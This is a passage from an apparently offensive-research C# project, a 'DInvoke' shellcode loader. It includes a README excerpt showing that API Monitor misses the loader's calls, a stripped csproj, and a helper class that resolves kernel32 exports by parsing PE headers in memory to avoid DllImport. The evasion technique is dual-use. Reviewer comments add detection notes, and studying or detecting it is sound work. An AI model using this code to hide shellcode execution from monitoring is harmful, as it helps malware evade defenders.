48 | * WaitForSingleObject 49 | 50 | 51 | 1. You could see the picture below, the SimpleLoader' s API call caught by API monitor. 52 | ![avatar](https://raw.githubusercontent.com/Kara-4search/tempPic/main/APIMon-Result1.png) 53 | 54 | 2. 
And the **DInvoke ShellcodeLoader**'s API calls were not caught by API Monitor. The three kernel32 functions are still executed (Program.cs resolves their addresses from the export table at run time and calls them through delegates), so this result reflects how the monitor attaches to calls rather than an absence of calls; telemetry keyed on the effects, such as the 0x40 read-write-execute allocation and a thread whose start address lies in that allocation, does not depend on how the function address was obtained. 55 | ![avatar](https://raw.githubusercontent.com/Kara-4search/tempPic/main/APIMon-Result2.png) 56 | 57 | 58 | ## Reference link: 59 | 60 | 1. https://github.com/CCob/SharpBlock 61 | 2. https://ethicalchaos.dev/2020/05/27/lets-create-an-edr-and-bypass-it-part-1/ 62 | 3. https://ethicalchaos.dev/2020/06/14/lets-create-an-edr-and-bypass-it-part-2/ 63 | 4. https://thewover.github.io/Dynamic-Invoke/ 64 | 5. https://offensivedefence.co.uk/posts/dinvoke-syscalls/ 65 | 6. https://github.com/TheWover/DInvoke 66 | 7. http://www.rohitab.com/discuss/topic/38807-api-monitor-v2-r10-release-instant-monitoring-without-definitions-support-for-dllmain-and-early-apis-windows-8/ 67 | 8. https://vimeo.com/566964438 68 | 9. https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createthread 69 | 10. https://docs.microsoft.com/en-us/dotnet/api/microsoft.visualstudio.shell.interop.vsdebugstartupinfo.dwcreationflags?view=visualstudiosdk-2019 70 | 71 | -------------------------------------------------------------------------------- /DInvoke_shellcodeload/DInvoke_test/DInvoke_shellcodeload.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {1CB19721-958A-48EA-AA5A-F7CE9B116F87} 8 | Exe 9 | DInvoke_test 10 | DInvoke_test 11 | v4.7.2 12 | 512 13 | true 14 | true 15 | 16 | 17 | AnyCPU 18 | true 19 | full 20 | false 21 | bin\Debug\ 22 | DEBUG;TRACE 23 | prompt 24 | 4 25 | 26 | 27 | AnyCPU 28 | pdbonly 29 | true 30 | bin\Release\ 31 | TRACE 32 | prompt 33 | 4 34 | 35 | 36 | true 37 | bin\x64\Debug\ 38 | DEBUG;TRACE 39 | full 40 | x64 41 | 7.3 42 | prompt 43 | true 44 | 45 | 46 | bin\x64\Release\ 47 | TRACE 48 | true 49 | pdbonly 50 | x64 51 | 7.3 52 | prompt 53 | true 54 | 55 | 56 | true 57 | bin\x86\Debug\ 58 | DEBUG;TRACE 59 | full 60 | x86 61 | 7.3 62 | prompt 63 | true 64 | 65 | 66 | bin\x86\Release\ 67 
// /DInvoke_shellcodeload/DInvoke_test/DInvokeFunctions.cs
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Runtime.InteropServices;
using System.IO;

namespace DInvoke_Code
{
    /// <summary>
    /// Helpers that turn a (module name, export name) pair into a native function
    /// address by enumerating the current process's loaded modules and reading the
    /// module's PE export directory directly from memory with <see cref="Marshal"/>.
    /// No <c>DllImport</c> declaration is used anywhere in this class.
    /// </summary>
    public class DInvokeFunctions
    {

        /// <summary>
        /// Finds an already-loaded module in the current process and returns its base address.
        /// </summary>
        /// <param name="DLLName">Module file name (or path suffix) to look for.</param>
        /// <returns>
        /// <c>BaseAddress</c> of the first module whose lower-cased <c>FileName</c> ends with the
        /// lower-cased <paramref name="DLLName"/>; <see cref="IntPtr.Zero"/> if none matches.
        /// </returns>
        public static IntPtr GetLoadedModuleAddress(string DLLName)
        {
            ProcessModuleCollection ProcModules = Process.GetCurrentProcess().Modules;
            foreach (ProcessModule Mod in ProcModules)
            {
                // NOTE(review): this is a suffix match on the full path, so any module whose
                // path merely ends with DLLName is accepted, and ToLower() is culture-sensitive.
                if (Mod.FileName.ToLower().EndsWith(DLLName.ToLower()))
                {
                    return Mod.BaseAddress;
                }
            }
            return IntPtr.Zero;
        }


        /// <summary>
        /// Resolves the address of <paramref name="FunctionName"/> exported by <paramref name="DLLName"/>.
        /// </summary>
        /// <param name="DLLName">Module to search for among the loaded modules.</param>
        /// <param name="FunctionName">Export name passed on to <see cref="GetExportAddress"/>.</param>
        /// <param name="CanLoadFromDisk">
        /// When true and the module is not loaded, <see cref="LoadModuleFromDisk"/> is tried.
        /// In this file that method always returns <see cref="IntPtr.Zero"/>, so this path
        /// always ends in <see cref="FileNotFoundException"/>.
        /// </param>
        /// <returns>The export's address as returned by <see cref="GetExportAddress"/>.</returns>
        /// <exception cref="FileNotFoundException">Module not loaded and the disk load returned zero.</exception>
        /// <exception cref="DllNotFoundException">Module not loaded and <paramref name="CanLoadFromDisk"/> is false.</exception>
        public static IntPtr GetLibraryAddress(string DLLName, string FunctionName, bool CanLoadFromDisk = false)
        {
            IntPtr hModule = GetLoadedModuleAddress(DLLName);
            if (hModule == IntPtr.Zero && CanLoadFromDisk)
            {
                hModule = LoadModuleFromDisk(DLLName);
                if (hModule == IntPtr.Zero)
                {
                    throw new FileNotFoundException(DLLName + ", unable to find the specified file.");
                }
            }
            else if (hModule == IntPtr.Zero)
            {
                throw new DllNotFoundException(DLLName + ", Dll was not found.");
            }

            return GetExportAddress(hModule, FunctionName);
        }


        /// <summary>
        /// Walks the in-memory PE headers of the module at <paramref name="ModuleBase"/> and
        /// returns the address of the export named <paramref name="ExportName"/>
        /// (compared with <see cref="StringComparison.OrdinalIgnoreCase"/>).
        /// </summary>
        /// <param name="ModuleBase">Base address of a mapped module in the current process.</param>
        /// <param name="ExportName">Export name to look up in the name table.</param>
        /// <returns><paramref name="ModuleBase"/> plus the RVA read from the export address table.</returns>
        /// <exception cref="InvalidOperationException">Any exception raised while reading the headers or tables.</exception>
        /// <exception cref="MissingMethodException">No name in the export name table matched.</exception>
        public static IntPtr GetExportAddress(IntPtr ModuleBase, string ExportName)
        {
            IntPtr FunctionPtr = IntPtr.Zero;
            try
            {

                // 0x3C in the DOS header holds the offset of the PE header (e_lfanew).
                Int32 PeHeader = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + 0x3C));
                // Read but never used below.
                Int16 OptHeaderSize = Marshal.ReadInt16((IntPtr)(ModuleBase.ToInt64() + PeHeader + 0x14));
                // The optional header starts 0x18 bytes after the PE signature.
                Int64 OptHeader = ModuleBase.ToInt64() + PeHeader + 0x18;
                Int16 Magic = Marshal.ReadInt16((IntPtr)OptHeader);
                Int64 pExport = 0;
                // 0x010b is the PE32 magic; every other value is treated as PE32+, whose
                // data directories start 0x10 bytes later.
                if (Magic == 0x010b)
                {
                    pExport = OptHeader + 0x60;
                }
                else
                {
                    pExport = OptHeader + 0x70;
                }


                // First data-directory entry: RVA of the export directory, then its fields.
                Int32 ExportRVA = Marshal.ReadInt32((IntPtr)pExport);
                Int32 OrdinalBase = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x10));
                // Read but never used below.
                Int32 NumberOfFunctions = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x14));
                Int32 NumberOfNames = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x18));
                Int32 FunctionsRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x1C));
                Int32 NamesRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x20));
                Int32 OrdinalsRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x24));

                // Linear scan of the name table; entry i of the ordinal table belongs to name i.
                for (int i = 0; i < NumberOfNames; i++)
                {
                    string FunctionName = Marshal.PtrToStringAnsi((IntPtr)(ModuleBase.ToInt64() + Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + NamesRVA + i * 4))));
                    if (FunctionName.Equals(ExportName, StringComparison.OrdinalIgnoreCase))
                    {
                        // OrdinalBase is added here and subtracted again on the next line, so the
                        // value read from the ordinal table is used directly as the table index.
                        // NOTE(review): ReadInt16 is signed; confirm behaviour for indexes >= 0x8000.
                        Int32 FunctionOrdinal = Marshal.ReadInt16((IntPtr)(ModuleBase.ToInt64() + OrdinalsRVA + i * 2)) + OrdinalBase;
                        Int32 FunctionRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + FunctionsRVA + (4 * (FunctionOrdinal - OrdinalBase))));
                        FunctionPtr = (IntPtr)((Int64)ModuleBase + FunctionRVA);
                        break;
                    }
                }
            }
            catch
            {
                // Catch parser failure
                // NOTE(review): the bare catch discards the original exception (including
                // access violations surfaced by Marshal), so the root cause is not reported.
                throw new InvalidOperationException("Failed to parse module exports.");
            }

            if (FunctionPtr == IntPtr.Zero)
            {
                // Export not found
                throw new MissingMethodException(ExportName + ", export not found.");
            }
            return FunctionPtr;
        }

        /// <summary>
        /// Placeholder for loading a module from disk. The original implementation is
        /// commented out, so this always returns <see cref="IntPtr.Zero"/> and
        /// <paramref name="DLLPath"/> is unused.
        /// </summary>
        /// <param name="DLLPath">Path of the module to load (currently ignored).</param>
        /// <returns>Always <see cref="IntPtr.Zero"/>.</returns>
        public static IntPtr LoadModuleFromDisk(string DLLPath)
        {
            /*
            Data.Native.UNICODE_STRING uModuleName = new Data.Native.UNICODE_STRING();
            Native.RtlInitUnicodeString(ref uModuleName, DLLPath);

            IntPtr hModule = IntPtr.Zero;
            Data.Native.NTSTATUS CallResult = Native.LdrLoadDll(IntPtr.Zero, 0, ref uModuleName, ref hModule);
            if (CallResult != Data.Native.NTSTATUS.Success || hModule == IntPtr.Zero)
            {
                return IntPtr.Zero;
            }
            */
            IntPtr hModule = IntPtr.Zero;
            return hModule;
        }
    }
}